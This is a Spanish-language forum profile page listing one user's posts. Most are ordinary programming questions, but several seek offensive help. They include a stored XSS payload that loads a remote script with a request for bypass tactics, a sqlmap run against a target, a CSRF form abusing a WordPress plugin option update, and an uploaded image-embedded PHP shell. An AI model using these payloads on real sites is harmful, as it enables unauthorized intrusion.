Mostrar Mensajes

Esta sección te permite ver todos los posts escritos por este usuario. Ten en cuenta que sólo puedes ver los posts escritos en zonas a las que tienes acceso en este momento.

Temas - LKI

Páginas: [1] 2
1
Dudas y pedidos generales / Inyección XSS persistente
« en: Julio 17, 2020, 11:17:46 pm »
Hola amigos, tengo una duda y acudo a ustedes en busca de conocimiento y experiencia. Estoy probando una inyección xss en un input llamemosle "biografia" que se encuentra dentro de la página de configuración del perfil, digamos en /settings el payload es el siguiente:

Código: [Seleccionar]
</script><script src=www.examplesite.com/examplescript.js></script>
Luego de guardar los cambios recargo la página /settings y el script es ejecutado correctamente.
Lo que no entiendo es porque al visitar la página de mi perfil, digamos /profile no se carga el valor rellenado en el paso anterior, es decir, debería cargar el script. Pero en vez de ello no carga nada y deja el campo que debería rellenar de forma vacía:


(Se puede ver que dentro del tag <p></p> no carga ningún dato y se encuentra vacío)

Pero el script en cuestión es devuelto por el servidor, ya que al revisar el response se ve claramente que el script viaja de vuelta al cliente:



Mi consulta es, ¿si conocen a que se debe este comportamiento, y qué tipo de tácticas se pueden utilizar para poder bypassear cualquier tipo de restricción y que el script en cuestión se ejecute?. Desde ya, muchas gracias!!

2
Dudas y pedidos generales / sqlmap error 403 forbidden
« en: Julio 09, 2020, 05:54:20 pm »
Hola amigos, estoy tratando de usar sqlmap para testear una vulnerabilidad, pero a la hora de ejecutar el comando
Código: [Seleccionar]
sqlmap.py -u "tagetwebsite.com?example=1" obtengo el error 403 forbidden y luego cuando el script termina me indica que obtuvo todos errores 403 forbidden. Lo raro es que al usar postman puedo ejecutar dicha url sin ninguna cookie o token de autorización, lo mismo desde el browser o incógnito. ¿Alguna idea?
Dejo las imágenes con los resultados y errores de la consola:


3
Hola underc0ders, tengo una duda,  me gustaría seguir expandiendo mis habilidades de detección de vulnerabilidades. Actualmente tengo conocimientos sobre SQL, XSS, LFI y Shell upload (no se si tiene un término para referirse a este ataque) ¿qué otras técnicas existen para verificar la seguridad de un sitio web?.
Saludos.

4
Dudas y pedidos generales / Hardware para Machine Learning
« en: Diciembre 25, 2019, 08:56:11 pm »
Hola a todos, estoy empezando en este mundo de machine learning con Python y Tensorflow. He logrado entrenar mi primer modelo y he podido implemenetarlo en Google Cloud. Me gustaría invertir en harware debido a que actualmente tengo una notebook un poco vieja que al ejecutar mi modelo demora mucho en devolver el resultado (15segundos) por ello utilizo Google Cloud que demora 5 a 7 segundos. Necesito asesoramiento ya que no tengo mucha idea de hardware, debería comprar una nueva pc y orientar todos los componentes a machine learning? o debería optimizar mi modelo entrenado para disminuir el tiempo de ejecución?. Dejo una captura de mis componentes actuales de hardware a lo mejor mejorando algún componente pueda mejorar el tiempo de ejecución?. Espero que alguien con conocimientos de ML pueda orientarme.



Saludos.

5
Hola chicos resulta que mi sitio de word press es vulnerable debido al plugin "HandL UTM Grabber V < 2.6.5". Me gustaría comprender esta vulnerabilidad, he leido este artículo: https://www.pluginvulnerabilities.com/2019/08/26/our-proactive-monitoring-caught-an-authenticated-option-update-vulnerability-in-handl-utm-grabber/ y no termino de comprender bien la vulnerabilidad, ¿cuál sería el daño que se puede ocasionar y cómo se llevaría acabo?

He probado ejecutar este código:
Código: [Seleccionar]
<html>
<body>
<form action="[url]http://vulnerable-site.com/wp-admin/admin-ajax.php?action=handl_notice_dismiss[/url]" method="POST">
<input type="hidden" name="field" value="users_can_register" />
<input type="submit" value="Submit" />
</form>
</body>
</html>

Y mi sitio devuelve un "0". ¿Significaría que el ataque se realizo con éxito? ¿Y ahora que acciones intrusivas podría realizar?


No he encontrado, más información que explique en detalle como llevar a cabo este ataque e información para comprender la vulnerabilidad. Espero que alguien pueda ayudarme.
Saludos.

6
Hola chicos estoy con un proyecto de tensorflow que funciona localmente a la perfección, he decidido subirlo a Google Cloud para poder hacer predicciones en línea. He probado enviar peticiones con el comando:

Código: [Seleccionar]
gcloud ai-platform predict --model my_model_test  --version model_v1 --json-instances prediction_input.json

Y el mismo retorna un array de números, que no me sirve, (en realidad no se interpretarlo). Por lo que seguí la siguiente guía de Google para tratar de devolver un string con la respuesta:

https://cloud.google.com/ml-engine/docs/custom-prediction-routines

Pero al momento de enlazar en la consola de Google ml (Crear versión de modelo) mi código personalizado que devuelve un string (Predictor), junto con el modelo entrenado (usé la versión 2.0 de TF) Obtengo el siguiente error: "Unexpected error when loading the model: "load_model" requires h5py.

Probé agregando la dependencia, como indica la guía usando setup.py, pero el error continúa. Espero que alguien pueda ayudarme!

Les dejo los recursos que estoy utilizando por si sirve para complementar la pregunta. https://github.com/zulu15/ML

7
Hola chicos! estoy empezando a usar Google Colab y tensorflow, estoy entrenando un modelo en particular "faster_rcnn_inception_v2_coco" con el siguiente comando:

 
Código: [Seleccionar]
"python train.py --logtostderr --train_dir=training/ --pipeline_config_path=training/faster_rcnn_inception_v2_coco.config

El entrenamiento se ejecuta correctamente pero los checkpoints no se guardan en la carpeta especificada, es decir, "training", por el contrario veo que se guardan en /tmp/tmpXXX y en cada nuevo entrenamiento se crea una nueva carpeta temp y no se resume desde el último checkpoint sino que empieza desde 0. ¿Alguien sabe como puedo solucionar esto? Saludos.

8
Dudas y pedidos generales / [SOLUCIONADO] Tesseract OCR
« en: Octubre 01, 2019, 12:36:12 pm »
Hola a todos, tengo una duda, estoy investigando esta tecnología para el reconocimiento óptico de caracteres y estoy un poco perdido, he probado algunos ejemplos y han funcionado. Pero con la siguiente imágen estoy teniendo problemas:


El comando que uso es:

Código: [Seleccionar]
tesseract default.jpg output --psm 8 -c tessedit_char_whitelist=0123456789abcdfghijkmnlopqrsturstuvwxyzGres

Y el resultado obtenido es:
lost

Espero que me puedan guiar, o dar algún recurso donde pueda leer más. Saludos.

9
Hola a todos! ¿Cómo estan? tengo una duda, espero que alguien pueda ayudarme, estoy haciendo un proyecto para la universidad en C# y python, en python tengo el programa cliente y en C# tengo desarrollada una web api servidor que recibe los pedidos del cliente y los procesa y retorna los datos solicitados.

Mi problema surge debido a que debo ejecutar varios clientes al mismo tiempo, y la web api al recibir múltiples request procesa en forma asyncrona (eso creo..) estos pedidos alterando el resultado deseado, ya que cada programa cliente debe recibir datos únicos desde la api para realizar un proceso específico y actualmente a veces se retorna el mismo cliente desde la api (obtenidos desde base de datos) a varios programas cliente python.

Dejo los códigos por si sirve para darle contexto a la pregunta:

1) Se ejecuta un archivo .bat que abre x instancias del programa cliente hecho en python:

Código: [Seleccionar]
cd "C:\Users\mnn\Desktop\workspace"

start py cliente.py

start py cliente.py

start py cliente.py

.....

pause

2) Cada programa cliente llama a la web api en espera de datos únicos que utiliza para hacer su proceso:


3) La web api en c# recibe la request obtiene los datos (desde una base de datos sql server) de un cliente único que no está siendo utilizado por ningún programa cliente, asocia (inserta los dos id en una tabla de sql server) el id único del programa cliente python con el id único del cliente obtenido en la base de datos y retorna los datos del cliente. (Este es el paso que falla ya que la web api al procesar las request al mismo tiempo devuelve los mismos datos de un cliente a varios programas cliente python) (El código esta simplificado no se ven las querys por ejemplo ya que la idea es mostrar el flujo de llamadas de cliente a web api y de web api a base de datos y retorno de datos al cliente python)


Adjunto Log mostrando el resultado no deseado, es decir, procesamiento asyncrono (foto)



Espero haber podido ser claro!!

Saludos!

10
Dudas y pedidos generales / [SOLUCIONADO] Resolución de captcha
« en: Agosto 12, 2019, 10:33:28 pm »
Hola a todos!! ¿Cómo están?

Tengo una inquietud sobre la resolución de un captcha. He estado investigando y he descubierto que es posible la resolución de captchas de manera automática utilizando una técnica conocida como OCR (Reconocimiento Óptico de caracteres). Por el momento todo bien, mi problema surge cuando al inspeccionar el captcha en cuestión me encuentro con lo siguiente:

 
Cómo se ve en la imágen el tag img tiene un atributo src que apunta a una url dinámica, dejo el nodo html:
Código: [Seleccionar]
<img id="captchaLogin" src="captcha/default.aspx?pos=2&amp;vers=427404578" alt="Código de verificación">
Este es mi mayor problema ya que al tratar de obtener la imágen del captcha mediante varios métodos desde el lado de javascript he probado con librerías como html2canvas y html2picture, modificar el atributo del nodo img para que al hacer click descargue la imágen con el atributo donwload de HTML5, utilizar drag and drop creando nodos para que copie la imágen, etc y al final el resultado fue el mismo, el navegador en cada uno de los métodos realizaba una petición HTTP GET a la URL dinámica y la misma generaba una imágen distinta a la orginal, por lo que ninguno generaba el resultado que yo necesito, es decir, descargar la imágen original generada al cargar la página web. Tengo algunas ideas pero no se como se podrían llevar a cabo ya que personalmente no es mi fuerte la programación del lado cliente, como por ejemplo:


El navegador chrome tiene una pestaña que es neetwork en donde al aplicar el filtro Img permite visualizar los recursos de tipo Imágen que la web utiliza y haciendo click derecho se puede guardar la imágen, obviamente no se si es posible realizar esto mediante una forma automática.

Espero que alguno de ustedes pueda ayudarme. Saludos!!

11
Hola a todos espero que alguien pueda asesorarme. Mi idea es hacer un dispositivo de trackeo para mi auto he visto que voy a necesitar una antena gps y una antena gsm más una plaqueta arduino y demás componentes como baterias y un chip. ¿Ustedes que me podrían recomendar respecto a precio calidad para poder llevar a cabo este proyecto? ¿Hay algun kit que puedan recomendarme?.
Saludos.

12
Hola underc0ders!!


Hola gente hermosa de underc0de, hoy vengo con una duda que me ha surgido recientemente, ya que un amigo me presento una idea para desarrollar una app Android, estilo red social instagram twitter... Yo soy desarrollador Java creo tener una base y conocimientos sólidos en este lenguaje pero nunca he desarrollado en Android a este nivel.. , se que desarrollar una app de este estilo conlleva mucho sacrificio, años dependiendo de las circunstancias, "pero no creo en los limites"..

Mi pregunta es la siguiente: ¿Que pasos me aconsejan realizar para llegar a obtener un nivel avanzado en desarrollo de apps Android?. Me refiero a pasos más que nada por que acudo a la experiencia de aquellas personas que han desarrollado e invertido mucho tiempo en el desarrollo Android, puntualmente necesito ahorrar la mayor cantidad de tiempo posible en cuanto a investigación, por eso necesitaria una excelente guia o libro que apunte justo al desarrollo avanzado y no se pierda en cuestiones que no me aportarían nada  a mi emprendimiento. "El tiempo es oro".

Desde ya saludos a toda la comunidad!.
PD: Espero con ansias sus respuestas..

13
Hola underc0ders tengo una duda sobre una vulnerabilidad..
He logrado subir mi shell a un servidor vulnerable, logre cambiar el formato de mi imagen jpg a .php.
Pero no se como ejecutarla o como se haría ya he probado con .php?cmd=ls y no ha funcionado....
Aclaro que el codigo php lo incruste en la sección de comentario del archivo jpg y luego logre cambiar su extension por php..
Saben como podria ejecutar mi codigo? si es correcto? o deberia buscar alguna otra shell?.

Desde ya muchas gracias a todos  los que deseen ayudarme , no tengo ningún fin malintencionado si logro vulnerar el servidor me comunicare con el webmaster para avisarle y que lo fixee.



PD: Buque en la sección pero no arrojo ningún resultado, por eso es que acudo a ustedes..

14
Dudas y pedidos generales / [SOLUCIONADO] Como iniciarse en PHP
« en: Diciembre 21, 2015, 07:26:32 pm »
Buenas a todos, hoy les vengo a consultar ¿cual seria la forma mas recomendable de iniciarse en este lenguaje?. Tengo conocimiento de programación en C++, Java , (frameworks como Spring, JSF , Hibernate), conocimientos web html5, css3 , javascript, etc.

Quisiera iniciarme en este lenguaje para luego poder aprender algun framework como Laravel. Saludos a todos!

15
Wargames y retos / [RETO] Ordenar caracteres (Dificultad=media)
« en: Agosto 20, 2015, 10:04:11 pm »

Ordenar de mayor a menor según cantidad de apariciones las siguientes letras del alfabeto. Si empatan, ordenar alfabéticamente. Dar la respuesta en minúscula.

  • La cadena es la siguiente:

Código: [Seleccionar]
qanwPVEAwnmSViNjTOLZPRRSaTAECnbArUjPmELcsWhdVMXYfdYLUGLpjLdOMdzvAEgfhXWNvRJZqMhlwocRPHKcwbUFJVjBjmLOwPVqjoYHLTtixQAnBHwuvfxDMPnAbpHBRNYTpKSzxLTWOusljvXidQjqbqjgcvpFMLbPPOkHdTTJbkswfdEeeFTbllerqvbFMpO
Se puede usar cualquier algoritmo y cualquier lenguaje!!

PD: Para que no se quejen el reto oficial es de la siguiente pagina http://hackealo.co/ y siempre cambia solo me pareció un buen reto nada más que eso.

Ganadores:
  • 79137913
  • MF

16
Buenas gente de underc0de!!

Vengo a consultarles si tienen idea de como conectar una app de facebook con un webservice de Java, ya que al parecer he visto unos tutoriales y facebook cambio todas las api y no encuentro informacion relacionada.
Saludos!!

17
Otros lenguajes / Programación de videojuegos
« en: Diciembre 20, 2014, 01:39:30 am »

Hola gente a continuacion les dejo unos libros para aquellos interesados en la programación de videojuegos, espero que les guste!!!


LINK ->http://www.etnassoft.com/biblioteca/turings-adventure/



LINK -> http://www.etnassoft.com/biblioteca/videojuegos-multiplataforma-con-openfl/



LINK -> http://www.etnassoft.com/biblioteca/libro-blanco-del-desarrollo-espanol-de-los-videojuegos/


LINK -> http://www.etnassoft.com/biblioteca/videojuegos-y-cultura-visual/


LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-un-enfoque-practico-3a-ed/



LINK -> http://www.etnassoft.com/biblioteca/logica-del-videojuego/





LINK -> http://www.etnassoft.com/biblioteca/diseno-de-videojuegos-sonido-interaccion-y-redes/




LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-1-arquitectura-del-motor-de-videojuegos-2a-edicion/





LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-2-programacion-grafica-2a-edicion/




LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-3-tecnicas-avanzadas-2a-edicion/




LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-4-desarrollo-de-componentes-2a-edicion/



LINK -> http://www.etnassoft.com/biblioteca/programacion-de-videojuegos-con-el-lenguaje-fenix/





LINK -> http://www.etnassoft.com/biblioteca/haciendo-un-juego-bajo-sdl/






LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-juegos-en-2d-usando-java-y-microsoft-xna/




LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-1-arquitectura-del-motor-de-videojuegos/





LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-2-programacion-grafica/



LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-3-tecnicas-avanzadas/



LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos-4-desarrollo-de-componentes/


LINK ->http://www.etnassoft.com/biblioteca/introduccion-a-la-programacion-de-juegos/



LINK -> http://www.etnassoft.com/biblioteca/desarrollo-de-videojuegos/




LINK -> http://www.etnassoft.com/biblioteca/programacion-de-videojuegos-con-sdl-para-windows-y-linux/


Fuente: taringa.net

18
Off Topic / Si los lenguajes de programación fueran armas!!!
« en: Diciembre 06, 2014, 06:16:39 pm »
Bueno gente me encontre con esto en una publicacion de facebook y me hizo reir un rato jajaj aca se los dejo:
PD: Hagan click sobre la imagen para visualizarla correctamente









fuente: http://9gag.com/gag/anXEbe0?ref=fb.s

19
Dudas y pedidos generales / Duda sobre wordpress
« en: Noviembre 19, 2014, 03:10:02 am »
Hola les hago una consulta a cerca de wordpress, resulta que navegando por una pagina web se me dio por revisar el robots.txt y encontre que estaba deshabilitado el "/wp-includes/"  luego lo invoque en la url y observe que se puede navegar por algunos directorios (se observaba un index largo con algunNombre.php). Bueno mi duda en general es si es provechoso o se pueda llegar a vulnerar este contenido..
                     
                                                         



PD: He buscado en google pero no he encontrado nada claro.

20
En este concurso usted debe asumir el papel de una entidad maliciosa", explicó la compañía. El desafío consta en ingresar a los servidores y extraer datos de una conversación.

                                                     
 

La aplicación de mensajería instantánea para móviles presentó hoy un concurso que premia con 300 mil dólares a quien logre vulnerar su sistema de seguridad encriptado.

La iniciativa, denominada "Cryptocontest", busca desafiar a cualquier persona a que ingrese a los servidores del servicio e intente extraer datos sensibles (como correo electrónico y contraseña) de una conversación privada entre dos usuarios ficticios.

"En este concurso usted debe asumir el papel de una entidad maliciosa", explica el comunicado oficial de la compañía fundada por los hermanos Durov el año pasado.

La comunicación virtual a "crackear", utiliza el sistema "Chats Secretos", una característica de Telegram que consiste en un tipo de protocolo de encriptación seguro.

Quien consiga vulnerar el sistema, deberá enviar el mensaje encriptado completo a la dirección de correo obtenida, con los registros de sesión y una explicación detallada del ataque informático, para obtener su premio.

En caso de haber un ganador, Telegram lo anunciará en el momento que ocurra o revelará la solución el 4 de febrero de 2015.

Se trata del segundo concurso de este tipo que lanza la compañía rusa ya que, con el mismo objetivo, a principios del año ofreció una recompensa en bitcoins por un valor equivalente a 200 mil dólares, aunque finalmente no hubo ganador.

Los concursos que premian los hallazgos de vulnerabilidades en sistemas informáticos son habituales en las grandes empresas de tecnología como Google y Microsoft.

Fuente: mdzol

Páginas: [1] 2